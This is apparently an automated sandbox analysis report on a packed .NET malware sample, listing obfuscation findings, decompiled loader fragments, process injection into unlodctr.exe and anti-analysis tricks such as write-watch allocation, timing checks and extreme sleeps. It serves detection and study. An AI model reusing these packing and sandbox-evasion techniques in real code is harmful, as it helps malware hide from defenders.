Source: Binary string: R:\JoeSecurity\trunk\src\windows\usermode\tools\FakeChrome\Release\Chrome.pdb source: LHmmkoXQgKLVlTwFJILFF.exe, 00000007.00000000.2734692610.000000000080E000.00000002.00000001.01000000.0000000C.sdmp, LHmmkoXQgKLVlTwFJILFF.exe, 00000009.00000000.2915078639.000000000080E000.00000002.00000001.01000000.0000000C.sdmp
Source: Binary string: wntdll.pdbUGP source: file.exe, 00000004.00000002.2845166430.00000000019A0000.00000040.00001000.00020000.00000000.sdmp, unlodctr.exe, 00000008.00000003.2847038817.0000000000CF0000.00000004.00000020.00020000.00000000.sdmp, unlodctr.exe, 00000008.00000002.3515125802.0000000003010000.00000040.00001000.00020000.00000000.sdmp, unlodctr.exe, 00000008.00000003.2843356794.0000000000B4A000.00000004.00000020.00020000.00000000.sdmp, unlodctr.exe, 00000008.00000002.3515125802.00000000031AE000.00000040.00001000.00020000.00000000.sdmp
Source: Binary string: wntdll.pdb source: file.exe, file.exe, 00000004.00000002.2845166430.00000000019A0000.00000040.00001000.00020000.00000000.sdmp, unlodctr.exe, unlodctr.exe, 00000008.00000003.2847038817.0000000000CF0000.00000004.00000020.00020000.00000000.sdmp, unlodctr.exe, 00000008.00000002.3515125802.0000000003010000.00000040.00001000.00020000.00000000.sdmp, unlodctr.exe, 00000008.00000003.2843356794.0000000000B4A000.00000004.00000020.00020000.00000000.sdmp, unlodctr.exe, 00000008.00000002.3515125802.00000000031AE000.00000040.00001000.00020000.00000000.sdmp
Source: Binary string: unlodctr.pdb source: file.exe, 00000004.00000002.2844123064.0000000001477000.00000004.00000020.00020000.00000000.sdmp, LHmmkoXQgKLVlTwFJILFF.exe, 00000007.00000002.3514082611.0000000001178000.00000004.00000020.00020000.00000000.sdmp

Data Obfuscation
barindex
.NET source code contains method to dynamically call methods (often used by packers)
Source: file.exe, Form1.cs .Net Code: LateBinding.LateCall((object)methodInfo, (Type)null, "Invoke", new object[2]{0,new string[3]{BN[0],BN[1],"VPBiblioteka"}}, (string[])null, (bool[])null)
Source: 0.2.file.exe.2c49a04.4.raw.unpack, XG.cs .Net Code: Type.GetTypeFromHandle(global::cO.Ri.k2anMS(16777298)).GetMethod("GetDelegateForFunctionPointer", new Type[2]{Type.GetTypeFromHandle(global::cO.Ri.k2anMS(16777243)),Type.GetTypeFromHandle(global::cO.Ri.k2anMS(16777254))})
Source: 0.2.file.exe.7060000.9.raw.unpack, XG.cs .Net Code: Type.GetTypeFromHandle(global::cO.Ri.k2anMS(16777298)).GetMethod("GetDelegateForFunctionPointer", new Type[2]{Type.GetTypeFromHandle(global::cO.Ri.k2anMS(16777243)),Type.GetTypeFromHandle(global::cO.Ri.k2anMS(16777254))})
Source: 0.2.file.exe.2c38d8c.3.raw.unpack, XG.cs .Net Code: Type.GetTypeFromHandle(global::cO.Ri.k2anMS(16777298)).GetMethod("GetDelegateForFunctionPointer", new Type[2]{Type.GetTypeFromHandle(global::cO.Ri.k2anMS(16777243)),Type.GetTypeFromHandle(global::cO.Ri.k2anMS(16777254))})
Source: 8.2.unlodctr.exe.363cd08.2.raw.unpack, Form1.cs .Net Code: LateBinding.LateCall((object)methodInfo, (Type)null, "Invoke", new object[2]{0,new string[3]{BN[0],BN[1],"VPBiblioteka"}}, (string[])null, (bool[])null)
Source: 9.2.LHmmkoXQgKLVlTwFJILFF.exe.2b6cd08.1.raw.unpack, Form1.cs .Net Code: LateBinding.LateCall((object)methodInfo, (Type)null, "Invoke", new object[2]{0,new string[3]{BN[0],BN[1],"VPBiblioteka"}}, (string[])null, (bool[])null)
Source: 9.0.LHmmkoXQgKLVlTwFJILFF.exe.2b6cd08.1.raw.unpack, Form1.cs .Net Code: LateBinding.LateCall((object)methodInfo, (Type)null, "Invoke", new object[2]{0,new string[3]{BN[0],BN[1],"VPBiblioteka"}}, (string[])null, (bool[])null)
.NET source code contains potential unpacker
Source: 0.2.file.exe.73f0000.10.raw.unpack, ijXhqSg1KPhojxnTQi.cs .Net Code: uMBYjMVglW System.Reflection.Assembly.Load(byte[])
Source: 0.2.file.exe.3fe35c8.6.raw.unpack, ijXhqSg1KPhojxnTQi.cs .Net Code: uMBYjMVglW System.Reflection.Assembly.Load(byte[])
Uses code obfuscation techniques (call, push, ret)
Source: C:\Users\user\Desktop\file.exe Code function: 0_2_010BCFA8 push eax; ret 0_2_010BCFA9
Source: C:\Users\user\Desktop\file.exe Code function: 0_2_05115E32 push ecx; iretd 0_2_05115E33
Source: C:\Users\user\Desktop\file.exe Code function: 4_2_0041789D push es; retf 4_2_0041789E
Source: C:\Users\user\Desktop\file.exe Code function: 4_2_0040D0AF push esi; iretd 4_2_0040D0B0
Source: C:\Users\user\Desktop\file.exe Code function: 4_2_0040CA39 push ebp; ret 4_2_0040CA53
Source: C:\Users\user\Desktop\file.exe Code function: 4_2_00413B53 push esi; iretd 4_2_00413C4C
Source: C:\Users\user\Desktop\file.exe Code function: 4_2_00413B93 push esi; iretd 4_2_00413C4C
Source: C:\Users\user\Desktop\file.exe Code function: 4_2_0041839C push ebp; iretd 4_2_0041839E
Source: C:\Users\user\Desktop\file.exe Code function: 4_2_00413C54 push 203B2B75h; iretd 4_2_00413C6B
Source: C:\Users\user\Desktop\file.exe Code function: 4_2_00403500 push eax; ret 4_2_00403502
Source: C:\Users\user\Desktop\file.exe Code function: 4_2_00405648 push esp; retf 4_2_0040564D
Source: C:\Users\user\Desktop\file.exe Code function: 4_2_0041878A push ds; iretd 4_2_0041878B
Source: C:\Users\user\Desktop\file.exe Code function: 4_2_019D09AD push ecx; mov dword ptr [esp], ecx 4_2_019D09B6
Source: C:\Windows\SysWOW64\unlodctr.exe Code function: 8_2_0301225F pushad ; ret 8_2_030127F9
Source: C:\Windows\SysWOW64\unlodctr.exe Code function: 8_2_030127FA pushad ; ret 8_2_030127F9
Source: C:\Windows\SysWOW64\unlodctr.exe Code function: 8_2_030409AD push ecx; mov dword ptr [esp], ecx 8_2_030409B6
Source: C:\Windows\SysWOW64\unlodctr.exe Code function: 8_2_0301283D push eax; iretd 8_2_03012858
Source: C:\Windows\SysWOW64\unlodctr.exe Code function: 8_2_03011200 push eax; iretd 8_2_03011369
Source: C:\Windows\SysWOW64\unlodctr.exe Code function: 8_2_00372160 push dword ptr [edi+36E8C72Ch]; retf 8_2_003721BD
Source: C:\Windows\SysWOW64\unlodctr.exe Code function: 8_2_00352145 push esp; retf 8_2_0035214A
Source: C:\Windows\SysWOW64\unlodctr.exe Code function: 8_2_00360751 push 203B2B75h; iretd 8_2_00360768
Source: C:\Windows\SysWOW64\unlodctr.exe Code function: 8_2_00360741 push esi; iretd 8_2_00360749
Source: C:\Windows\SysWOW64\unlodctr.exe Code function: 8_2_00364E99 push ebp; iretd 8_2_00364E9B
Source: C:\Windows\SysWOW64\unlodctr.exe Code function: 8_2_00369050 push esp; retf 8_2_003690B2
Source: C:\Windows\SysWOW64\unlodctr.exe Code function: 8_2_00369050 pushfd ; retf 0DE4h 8_2_00369157
Source: C:\Windows\SysWOW64\unlodctr.exe Code function: 8_2_003690A3 push esp; retf 8_2_003690B2
Source: C:\Windows\SysWOW64\unlodctr.exe Code function: 8_2_0036B145 pushad ; retf 8_2_0036B14E
Source: C:\Windows\SysWOW64\unlodctr.exe Code function: 8_2_00365287 push ds; iretd 8_2_00365288
Source: file.exe Static PE information: section name: .text entropy: 7.960811325672934
Source: 0.2.file.exe.73f0000.10.raw.unpack, VRC0Epa8tYXxDHxeeb.cs High entropy of concatenated method names: 'ToString', 'kGBAJOvWYv', 'r7XAB3kLGc', 'KxAAbq6qs1', 'lbhAy6NIni', 'QQgAnOIj6q', 'Ih5AIUULqp', 'mCkA1f0H2w', 'frVA4FbGUG', 'DSkAWqwVv5'
Source: 0.2.file.exe.73f0000.10.raw.unpack, FUd2ZVwwXuVcnVBSTbC.cs High entropy of concatenated method names: 'ToString', 'uu5pK789Ye', 'fwEpYtVWD4', 'd2lpSAB9M8', 'lWdpr6xpTA', 'LOapuOden4', 'JgKpxRs4QB', 'DV0p5gmSEC', 'JMWG9ZpCP5oZyfaOPuX', 'F2aYiepfWyGHprIvsN1'
Source: 0.2.file.exe.73f0000.10.raw.unpack, l5EVrC1ek6BSjKYIJU.cs High entropy of concatenated method names: 'PW6Dr54o4g', 'xtwDxQ3shS', 'DJvDsQ4LMa', 'Wpas73kqVu', 'j1cszL384x', 'GHmDt3YJWt', 'bKCDwMZF4w', 'DCkDch438L', 'BBiDKXym49', 'XlkDYaPC0Z'
Source: 0.2.file.exe.73f0000.10.raw.unpack, Tb6YZsuH878H6WyDR9.cs High entropy of concatenated method names: 'Dispose', 'dfYwdj8aZq', 'ReUcBVAkWL', 'f50aaHLZm9', 'YXZw7MjARv', 'kiHwz7yq35', 'ProcessDialogKey', 'N2ecttFxRG', 'cfucwYorwV', 'evYccwEBUm'
Source: 0.2.file.exe.73f0000.10.raw.unpack, V1T5bBQaeiVe1JDLJI.cs High entropy of concatenated method names: 'jGeeTWPX7E', 'GgneXf2IZx', 'TRDemAPFoI', 'DsXeB99sHL', 'Gv9eyJM0CS', 'lqieniDJhS', 'Hxse18NLFU', 'iZIe4oFQZQ', 'pmleGvTUSa', 'YnbeJoPmNL'
Source: 0.2.file.exe.73f0000.10.raw.unpack, Wd51lrwKXLayvn5vncY.cs High entropy of concatenated method names: 'CanConvertFrom', 'ConvertFrom', 'ConvertTo', 'tbOp9EKD6V', 'WnTpfurdsQ', 'W5hpaQnOc5', 'F30p6ZFJSN', 'Uw0pOkeFRP', 'zQ3pvwg2co', 'yj5p2ZNVV3'
Source: 0.2.file.exe.73f0000.10.raw.unpack, wl1ewjzyRV0uGEBdPo.cs High entropy of concatenated method names: 'CanConvertFrom', 'ConvertFrom', 'ConvertTo', 'VuJZeBuxls', 'PavZkZydOS', 'RiUZATh3VG', 'pSwZqoo6KB', 'dejZM0Z4h8', 'EgmZZd09Fd', 'LvhZpAA7Ay'
Source: 0.2.file.exe.73f0000.10.raw.unpack, qQvjySwtE9dl2fdoVIB.cs High entropy of concatenated method names: 'yPIZi75mrX', 'n1CZlGLXyC', 'esLZjLnQb3', 'JxPZUOrpTJ', 'jYwZCU0Erj', 'U7JZRqGZp2', 'FFRZh0wxe8', 'Q65ZTJNv4G', 'LOeZXiATqP', 'NDjZ8AZ8NK'
Source: 0.2.file.exe.73f0000.10.raw.unpack, ijXhqSg1KPhojxnTQi.cs High entropy of concatenated method names: 'KkmKSq9UBA', 'NfGKrNhAT0', 'ofeKuBZPO9', 'eb3KxqkHWl', 'RBLK59uy56', 'UBdKs3HMOy', 'RRsKDClLw2', 'pn8Kgwxn2q', 'JUGKPD02gy', 'qphK3w4cLB'
Source: 0.2.file.exe.73f0000.10.raw.unpack, bEBUmO7dB0XUGe5lq0.cs High entropy of concatenated method names: 'WAEZw9vNSH', 'tyeZKjVnmB', 'hgLZYIxRWQ', 'FfTZrqm9QW', 'aUSZu4vNsv', 'SDrZ5NE09B', 'd7fZsqaAWT', 'I7jM2NxH94', 'V0mMoqh97K', 'iFdMdfaC7W'
Source: 0.2.file.exe.73f0000.10.raw.unpack, rZJ0oGcihsUEbKChpu.cs High entropy of concatenated method names: 'TGjj9qhQj', 'iD7UHr94Y', 'hliRp79CN', 'WcLhcrHc2', 'IoqXfBvN1', 'exr8cyKHo', 'PhHvUZq3nXO4d90q9c', 'PcOCJpOe9lSgOHFvRf', 'aWIMfieHm', 'ecPp5ykh1'
Source: 0.2.file.exe.73f0000.10.raw.unpack, R7X05391IZAgJ5nYKQ.cs High entropy of concatenated method names: 'tVkkGq3Ug4', 'ijTkHr0mmj', 'sI0k9FSi8w', 'EYykf4oUsU', 'Ew8kB6MAVY', 'V69kbYAwMs', 'UuskyS3IpS', 'Jq3knenSsg', 't4lkIwZVU9', 'd5ck1oTVi8'
Source: 0.2.file.exe.73f0000.10.raw.unpack, sHU9DVX5HX33Zk5IYm.cs High entropy of concatenated method names: 'zr7xUi4GWK', 'zhRxRCX1uE', 'pVCxTq5RBM', 'maHxXpUJxV', 'KK9xkFlqt0', 'GKaxAoCwHD', 'NTlxqHES41', 'kLJxMbnJbq', 'SpOxZgAUjD', 'YTcxpWG2fj'
Source: 0.2.file.exe.73f0000.10.raw.unpack, ntFxRGdKfuYorwVSvY.cs High entropy of concatenated method names: 'zkqMmNppsk', 'SJyMBgLEAU', 'n8HMb8rU3E', 'Oc5My5DsyR', 'Vt8M92Xg7v', 'R6cMnOnxtD', 'Next', 'Next', 'Next', 'NextBytes'
Source: 0.2.file.exe.73f0000.10.raw.unpack, lra31V8QeglZ3BKldi.cs High entropy of concatenated method names: 'lTt5C93GGD', 'w1S5hcE2hM', 'xpbxbykAfU', 'WGFxyoRP6y', 'dknxnD2eX3', 'phKxIi6aa7', 'hQRx1x6ni8', 'NHvx47jhui', 's1IxWXUxLT', 'coNxGtsQj9'
Source: 0.2.file.exe.73f0000.10.raw.unpack, CbcXJVWp86UMJiRmu7.cs High entropy of concatenated method names: 'XBGDieLWic', 'NumDl7TEDG', 'pV2DjGDfhb', 'B7eDU4yH4C', 'dF8DCQgRhF', 'iTJDR279T6', 'iFyDhiV9Z8', 'JBiDTEdC9r', 'JjwDXBcOsP', 'soKD8pH2yd'
Source: 0.2.file.exe.73f0000.10.raw.unpack, I2uc7WT7LwxsvBMWY7.cs High entropy of concatenated method names: 'CJiu9hC8do', 'DgOufcCFgo', 'TUVuaLPE5A', 'ht9u606ySU', 't5yuOfysly', 'xAwuv0Gc54', 'fhGu2erqCH', 'z3Cuo6yPiT', 'EuDudLXIej', 'JRcu7nehUf'
Source: 0.2.file.exe.73f0000.10.raw.unpack, QAmXL0YFLqgDxjqpau.cs High entropy of concatenated method names: 'SoywD2uc7W', 'YLwwgxsvBM', 't5Hw3X33Zk', 'hIYw0mPra3', 'GKlwkdiRTw', 'vX2wAXDQDK', 'KYQcefMaKc4PjAeOHE', 'alSeW0CvA53PxSNCbN', 'ONKwwK6icv', 'lIywKmsmR9'
Source: 0.2.file.exe.73f0000.10.raw.unpack, CcPDcNvV32VKps9aAw.cs High entropy of concatenated method names: 'oZKqo62bwh', 'KiTq7k6ZQX', 'VOHMtUcQ1W', 'nHGMw2wYnS', 'mWKqJOUH2D', 'UDVqHAsbBM', 'rtjqQ6JVwg', 'A03q9L2IbO', 'o6Wqf3CEja', 'AbeqaVjIPb'
Source: 0.2.file.exe.73f0000.10.raw.unpack, EZMjARovgiH7yq35G2.cs High entropy of concatenated method names: 'BvMMryP1AF', 'I3oMukgVFW', 'zSkMxoSwR1', 'g3CM5qJPZC', 'qrZMs07ygc', 't3kMDU1DU0', 'VLHMg6JWCS', 'dLrMPb4gAr', 'mmNM3VlH9J', 'E79M00oskx'
Source: 0.2.file.exe.73f0000.10.raw.unpack, BTwLX2mXDQDKTRKD7F.cs High entropy of concatenated method names: 'ie9sS1LXTC', 'z2nsuqUaRv', 'PEes5KD9BQ', 'X2AsDXnhf1', 'w8hsgNEDVX', 'c2e5Odhe1D', 'L3S5vh6cDV', 'jYV52IAEqa', 'VW65oUpjTU', 'Kys5d1BnB7'
Source: 0.2.file.exe.3fe35c8.6.raw.unpack, VRC0Epa8tYXxDHxeeb.cs High entropy of concatenated method names: 'ToString', 'kGBAJOvWYv', 'r7XAB3kLGc', 'KxAAbq6qs1', 'lbhAy6NIni', 'QQgAnOIj6q', 'Ih5AIUULqp', 'mCkA1f0H2w', 'frVA4FbGUG', 'DSkAWqwVv5'
Source: 0.2.file.exe.3fe35c8.6.raw.unpack, FUd2ZVwwXuVcnVBSTbC.cs High entropy of concatenated method names: 'ToString', 'uu5pK789Ye', 'fwEpYtVWD4', 'd2lpSAB9M8', 'lWdpr6xpTA', 'LOapuOden4', 'JgKpxRs4QB', 'DV0p5gmSEC', 'JMWG9ZpCP5oZyfaOPuX', 'F2aYiepfWyGHprIvsN1'
Source: 0.2.file.exe.3fe35c8.6.raw.unpack, l5EVrC1ek6BSjKYIJU.cs High entropy of concatenated method names: 'PW6Dr54o4g', 'xtwDxQ3shS', 'DJvDsQ4LMa', 'Wpas73kqVu', 'j1cszL384x', 'GHmDt3YJWt', 'bKCDwMZF4w', 'DCkDch438L', 'BBiDKXym49', 'XlkDYaPC0Z'
Source: 0.2.file.exe.3fe35c8.6.raw.unpack, Tb6YZsuH878H6WyDR9.cs High entropy of concatenated method names: 'Dispose', 'dfYwdj8aZq', 'ReUcBVAkWL', 'f50aaHLZm9', 'YXZw7MjARv', 'kiHwz7yq35', 'ProcessDialogKey', 'N2ecttFxRG', 'cfucwYorwV', 'evYccwEBUm'
Source: 0.2.file.exe.3fe35c8.6.raw.unpack, V1T5bBQaeiVe1JDLJI.cs High entropy of concatenated method names: 'jGeeTWPX7E', 'GgneXf2IZx', 'TRDemAPFoI', 'DsXeB99sHL', 'Gv9eyJM0CS', 'lqieniDJhS', 'Hxse18NLFU', 'iZIe4oFQZQ', 'pmleGvTUSa', 'YnbeJoPmNL'
Source: 0.2.file.exe.3fe35c8.6.raw.unpack, Wd51lrwKXLayvn5vncY.cs High entropy of concatenated method names: 'CanConvertFrom', 'ConvertFrom', 'ConvertTo', 'tbOp9EKD6V', 'WnTpfurdsQ', 'W5hpaQnOc5', 'F30p6ZFJSN', 'Uw0pOkeFRP', 'zQ3pvwg2co', 'yj5p2ZNVV3'
Source: 0.2.file.exe.3fe35c8.6.raw.unpack, wl1ewjzyRV0uGEBdPo.cs High entropy of concatenated method names: 'CanConvertFrom', 'ConvertFrom', 'ConvertTo', 'VuJZeBuxls', 'PavZkZydOS', 'RiUZATh3VG', 'pSwZqoo6KB', 'dejZM0Z4h8', 'EgmZZd09Fd', 'LvhZpAA7Ay'
Source: 0.2.file.exe.3fe35c8.6.raw.unpack, qQvjySwtE9dl2fdoVIB.cs High entropy of concatenated method names: 'yPIZi75mrX', 'n1CZlGLXyC', 'esLZjLnQb3', 'JxPZUOrpTJ', 'jYwZCU0Erj', 'U7JZRqGZp2', 'FFRZh0wxe8', 'Q65ZTJNv4G', 'LOeZXiATqP', 'NDjZ8AZ8NK'
Source: 0.2.file.exe.3fe35c8.6.raw.unpack, ijXhqSg1KPhojxnTQi.cs High entropy of concatenated method names: 'KkmKSq9UBA', 'NfGKrNhAT0', 'ofeKuBZPO9', 'eb3KxqkHWl', 'RBLK59uy56', 'UBdKs3HMOy', 'RRsKDClLw2', 'pn8Kgwxn2q', 'JUGKPD02gy', 'qphK3w4cLB'
Source: 0.2.file.exe.3fe35c8.6.raw.unpack, bEBUmO7dB0XUGe5lq0.cs High entropy of concatenated method names: 'WAEZw9vNSH', 'tyeZKjVnmB', 'hgLZYIxRWQ', 'FfTZrqm9QW', 'aUSZu4vNsv', 'SDrZ5NE09B', 'd7fZsqaAWT', 'I7jM2NxH94', 'V0mMoqh97K', 'iFdMdfaC7W'
Source: 0.2.file.exe.3fe35c8.6.raw.unpack, rZJ0oGcihsUEbKChpu.cs High entropy of concatenated method names: 'TGjj9qhQj', 'iD7UHr94Y', 'hliRp79CN', 'WcLhcrHc2', 'IoqXfBvN1', 'exr8cyKHo', 'PhHvUZq3nXO4d90q9c', 'PcOCJpOe9lSgOHFvRf', 'aWIMfieHm', 'ecPp5ykh1'
Source: 0.2.file.exe.3fe35c8.6.raw.unpack, R7X05391IZAgJ5nYKQ.cs High entropy of concatenated method names: 'tVkkGq3Ug4', 'ijTkHr0mmj', 'sI0k9FSi8w', 'EYykf4oUsU', 'Ew8kB6MAVY', 'V69kbYAwMs', 'UuskyS3IpS', 'Jq3knenSsg', 't4lkIwZVU9', 'd5ck1oTVi8'
Source: 0.2.file.exe.3fe35c8.6.raw.unpack, sHU9DVX5HX33Zk5IYm.cs High entropy of concatenated method names: 'zr7xUi4GWK', 'zhRxRCX1uE', 'pVCxTq5RBM', 'maHxXpUJxV', 'KK9xkFlqt0', 'GKaxAoCwHD', 'NTlxqHES41', 'kLJxMbnJbq', 'SpOxZgAUjD', 'YTcxpWG2fj'
Source: 0.2.file.exe.3fe35c8.6.raw.unpack, ntFxRGdKfuYorwVSvY.cs High entropy of concatenated method names: 'zkqMmNppsk', 'SJyMBgLEAU', 'n8HMb8rU3E', 'Oc5My5DsyR', 'Vt8M92Xg7v', 'R6cMnOnxtD', 'Next', 'Next', 'Next', 'NextBytes'
Source: 0.2.file.exe.3fe35c8.6.raw.unpack, lra31V8QeglZ3BKldi.cs High entropy of concatenated method names: 'lTt5C93GGD', 'w1S5hcE2hM', 'xpbxbykAfU', 'WGFxyoRP6y', 'dknxnD2eX3', 'phKxIi6aa7', 'hQRx1x6ni8', 'NHvx47jhui', 's1IxWXUxLT', 'coNxGtsQj9'
Source: 0.2.file.exe.3fe35c8.6.raw.unpack, CbcXJVWp86UMJiRmu7.cs High entropy of concatenated method names: 'XBGDieLWic', 'NumDl7TEDG', 'pV2DjGDfhb', 'B7eDU4yH4C', 'dF8DCQgRhF', 'iTJDR279T6', 'iFyDhiV9Z8', 'JBiDTEdC9r', 'JjwDXBcOsP', 'soKD8pH2yd'
Source: 0.2.file.exe.3fe35c8.6.raw.unpack, I2uc7WT7LwxsvBMWY7.cs High entropy of concatenated method names: 'CJiu9hC8do', 'DgOufcCFgo', 'TUVuaLPE5A', 'ht9u606ySU', 't5yuOfysly', 'xAwuv0Gc54', 'fhGu2erqCH', 'z3Cuo6yPiT', 'EuDudLXIej', 'JRcu7nehUf'
Source: 0.2.file.exe.3fe35c8.6.raw.unpack, QAmXL0YFLqgDxjqpau.cs High entropy of concatenated method names: 'SoywD2uc7W', 'YLwwgxsvBM', 't5Hw3X33Zk', 'hIYw0mPra3', 'GKlwkdiRTw', 'vX2wAXDQDK', 'KYQcefMaKc4PjAeOHE', 'alSeW0CvA53PxSNCbN', 'ONKwwK6icv', 'lIywKmsmR9'
Source: 0.2.file.exe.3fe35c8.6.raw.unpack, CcPDcNvV32VKps9aAw.cs High entropy of concatenated method names: 'oZKqo62bwh', 'KiTq7k6ZQX', 'VOHMtUcQ1W', 'nHGMw2wYnS', 'mWKqJOUH2D', 'UDVqHAsbBM', 'rtjqQ6JVwg', 'A03q9L2IbO', 'o6Wqf3CEja', 'AbeqaVjIPb'
Source: 0.2.file.exe.3fe35c8.6.raw.unpack, EZMjARovgiH7yq35G2.cs High entropy of concatenated method names: 'BvMMryP1AF', 'I3oMukgVFW', 'zSkMxoSwR1', 'g3CM5qJPZC', 'qrZMs07ygc', 't3kMDU1DU0', 'VLHMg6JWCS', 'dLrMPb4gAr', 'mmNM3VlH9J', 'E79M00oskx'
Source: 0.2.file.exe.3fe35c8.6.raw.unpack, BTwLX2mXDQDKTRKD7F.cs High entropy of concatenated method names: 'ie9sS1LXTC', 'z2nsuqUaRv', 'PEes5KD9BQ', 'X2AsDXnhf1', 'w8hsgNEDVX', 'c2e5Odhe1D', 'L3S5vh6cDV', 'jYV52IAEqa', 'VW65oUpjTU', 'Kys5d1BnB7'
Source: 0.2.file.exe.2c49a04.4.raw.unpack, XG.cs High entropy of concatenated method names: 'S1d', 'RgtTUJcyZL', 'n1Q', 'M1r', 'Y1a', 'U1m', 'k2an4M', 'gt', 'kU', 'rK'
Source: 0.2.file.exe.7060000.9.raw.unpack, XG.cs High entropy of concatenated method names: 'S1d', 'RgtTUJcyZL', 'n1Q', 'M1r', 'Y1a', 'U1m', 'k2an4M', 'gt', 'kU', 'rK'
Source: 0.2.file.exe.2c38d8c.3.raw.unpack, XG.cs High entropy of concatenated method names: 'S1d', 'RgtTUJcyZL', 'n1Q', 'M1r', 'Y1a', 'U1m', 'k2an4M', 'gt', 'kU', 'rK'
Source: C:\Users\user\Desktop\file.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Users\user\Desktop\file.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Users\user\Desktop\file.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Users\user\Desktop\file.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Users\user\Desktop\file.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Users\user\Desktop\file.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Users\user\Desktop\file.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Users\user\Desktop\file.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Users\user\Desktop\file.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Users\user\Desktop\file.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Users\user\Desktop\file.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Users\user\Desktop\file.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Users\user\Desktop\file.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Users\user\Desktop\file.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Users\user\Desktop\file.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Users\user\Desktop\file.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Users\user\Desktop\file.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Users\user\Desktop\file.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Users\user\Desktop\file.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Users\user\Desktop\file.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Users\user\Desktop\file.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Users\user\Desktop\file.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Users\user\Desktop\file.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Users\user\Desktop\file.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Users\user\Desktop\file.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Users\user\Desktop\file.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Users\user\Desktop\file.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Users\user\Desktop\file.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Users\user\Desktop\file.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Users\user\Desktop\file.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Users\user\Desktop\file.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Users\user\Desktop\file.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Users\user\Desktop\file.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Users\user\Desktop\file.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Users\user\Desktop\file.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Users\user\Desktop\file.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Users\user\Desktop\file.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Users\user\Desktop\file.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Users\user\Desktop\file.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Users\user\Desktop\file.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Users\user\Desktop\file.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Users\user\Desktop\file.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Windows\SysWOW64\unlodctr.exe Process information set: NOGPFAULTERRORBOX | NOOPENFILEERRORBOX Jump to behavior
Source: C:\Windows\SysWOW64\unlodctr.exe Process information set: NOGPFAULTERRORBOX | NOOPENFILEERRORBOX Jump to behavior
Source: C:\Windows\SysWOW64\unlodctr.exe Process information set: NOGPFAULTERRORBOX | NOOPENFILEERRORBOX Jump to behavior
Source: C:\Windows\SysWOW64\unlodctr.exe Process information set: NOGPFAULTERRORBOX | NOOPENFILEERRORBOX Jump to behavior
Source: C:\Windows\SysWOW64\unlodctr.exe Process information set: NOGPFAULTERRORBOX | NOOPENFILEERRORBOX Jump to behavior

Malware Analysis System Evasion
barindex
Yara detected AntiVM3
Source: Yara match File source: Process Memory Space: file.exe PID: 6608, type: MEMORYSTR
Allocates memory with a write watch (potentially for evading sandboxes)
Source: C:\Users\user\Desktop\file.exe Memory allocated: 10B0000 memory reserve | memory write watch Jump to behavior
Source: C:\Users\user\Desktop\file.exe Memory allocated: 2BE0000 memory reserve | memory write watch Jump to behavior
Source: C:\Users\user\Desktop\file.exe Memory allocated: 29B0000 memory reserve | memory write watch Jump to behavior
Source: C:\Users\user\Desktop\file.exe Memory allocated: 7480000 memory reserve | memory write watch Jump to behavior
Source: C:\Users\user\Desktop\file.exe Memory allocated: 8480000 memory reserve | memory write watch Jump to behavior
Source: C:\Users\user\Desktop\file.exe Memory allocated: 8710000 memory reserve | memory write watch Jump to behavior
Source: C:\Users\user\Desktop\file.exe Memory allocated: 9710000 memory reserve | memory write watch Jump to behavior
Contains functionality for execution timing, often used to detect debuggers
Source: C:\Users\user\Desktop\file.exe Code function: 4_2_01A1096E rdtsc 4_2_01A1096E
Contains long sleeps (>= 3 min)
Source: C:\Users\user\Desktop\file.exe Thread delayed: delay time: 922337203685477 Jump to behavior
Found large amount of non-executed APIs
Source: C:\Users\user\Desktop\file.exe API coverage: 0.7 %
Source: C:\Windows\SysWOW64\unlodctr.exe API coverage: 2.6 %
May sleep (evasive loops) to hinder dynamic analysis
Source: C:\Users\user\Desktop\file.exe TID: 6632 Thread sleep time: -922337203685477s >= -30000s Jump to behavior
